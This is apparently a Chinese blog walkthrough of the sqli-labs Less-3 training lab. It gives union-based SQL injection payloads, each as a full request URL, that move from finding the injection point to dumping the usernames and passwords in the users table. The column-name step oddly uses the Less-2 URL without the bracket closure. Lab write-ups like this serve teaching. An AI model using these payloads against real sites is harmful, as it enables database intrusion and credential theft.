目 录CONTENT

文章目录

sqli-labs系列——Less-3

CZ
CZ
2023-06-01 / 0 评论 / 0 点赞 / 299 阅读 / 3319 字 / 正在检测是否收录...
温馨提示:
本文最后更新于 2024-04-24,若内容或图片失效,请留言反馈。部分素材来自网络,若不小心影响到您的利益,请联系我们删除。

摘要

本文介绍如何通过sqli-labs的Less-3题目进行SQL注入攻击的步骤。通过判断是否存在注入、判断显错位、判断库名、版本号、判断表名、判断列名和判断数据等步骤,成功获取了目标网站的用户名密码。同时,本文还提供了美化后的格式结果,使得结果更加清晰易读。

实验环节

前期准备

su -  root
docker run -d --name sqli-labs -p 80:80 -p 13306:3306 --rm acgpiano/sqli-labs    #为了不占用系统资源,这条命令在每次虚拟机关机后会自动清除进程,所以每次开机后都要运行这条命令

浏览器访问Less-3的地址

图片-1685609154316

打开HackBar插件

判断是否存在注入
http://192.168.199.129/Less-3/?id=1'
#如下图可推断sql语句是单引号字符型且有括号,所以我们需要闭合单引号且也要考虑括号。

图片-1685609355208

http://192.168.199.129/Less-3/?id=1') order by 4 -- xz
#order by 1-3都是没有任何异常,4显示报错

图片-1685609589695

判断显错位
http://192.168.199.129/Less-3/?id=-1') union select 1,2,3 -- xz

图片-1685609723038

判断库名,版本号
http://192.168.199.129/Less-3/?id=-1') union select 1,database(),version() -- xz

图片-1685609775214

判断表名
http://192.168.199.129/Less-3/?id=-1')  union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' -- xz   
#也可使用limit一个一个查询,这样不容易掉坑,Less-1讲解了具体用法,这里就不多说了

图片-1685609821080

判断列名
http://192.168.199.129/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' -- xz     

图片-1685609881053

判断数据
http://192.168.199.129/Less-3/?id=-1')  union select 1,group_concat(username),group_concat(password) from users -- xz

图片-1685609931314

美化后的格式结果

http://192.168.199.129/Less-3/?id=-1')  union select 1,group_concat(username,0x3a,password,0x3C,0x68,0x72,0x2F,0x3E),3 from users  -- xz

图片-1685609969191

0

评论区